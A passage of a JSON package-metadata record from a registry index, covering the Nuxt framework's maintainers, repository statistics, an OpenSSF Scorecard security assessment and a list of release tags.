sues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbuilder/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbuilder/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbuilder/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbuilder/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbuilder/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbuilder/codemeta","maintainers":[{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-20T01:59:34.740Z","updated_at":"2022-11-20T01:59:34.740Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2022-11-20T01:59:34.723Z","updated_at":"2022-11-20T01:59:34.723Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-20T01:59:34.728Z","updated_at":"2022-11-20T01:59:34.728Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2022-11-20T01:59:34.786Z","updated_at":"2022-11-20T01:59:34.786Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:27:05.095Z","updated_at":"2023-08-19T18:27:05.095Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":6247457,"name":"github.com/nuxt/nuxt","ecosystem":"go","description":null,"homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"github.com/nuxt","versions_count":290,"first_release_published_at":"2016-11-07T22:26:53.000Z","latest_release_published_at":"2026-05-10T23:42:13.000Z","latest_release_number":"v4.4.5+incompatible","last_synced_at":"2026-05-11T01:23:32.747Z","created_at":"2023-02-03T00:53:15.143Z","updated_at":"2026-05-11T01:23:32.748Z","registry_url":"https://pkg.go.dev/github.com/nuxt/nuxt","install_command":"go get github.com/nuxt/nuxt","documentation_url":"https://pkg.go.dev/github.com/nuxt/nuxt#section-documentation","metadata":{},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-02-13T11:08:58.000Z","size":134344,"stargazers_count":59568,"open_issues_count":935,"forks_count":5524,"subscribers_count":784,"default_branch":"main","last_synced_at":"2026-02-13T11:29:52.149Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-02-13T11:06:01.000Z","dependencies_parsed_at":"2024-12-25T13:30:54.580Z","dependency_job_id":"22cffcce-6e0a-4001-b86c-b81e60fdf77b","html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":311,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29414277,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T06:24:03.484Z","status":"ssl_error","status_checked_at":"2026-02-13T06:23:12.830Z","response_time":78,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":62,"last_synced_at":"2026-01-11T15:52:13.608Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":116453,"followers":4523,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-01-11T15:52:13.608Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"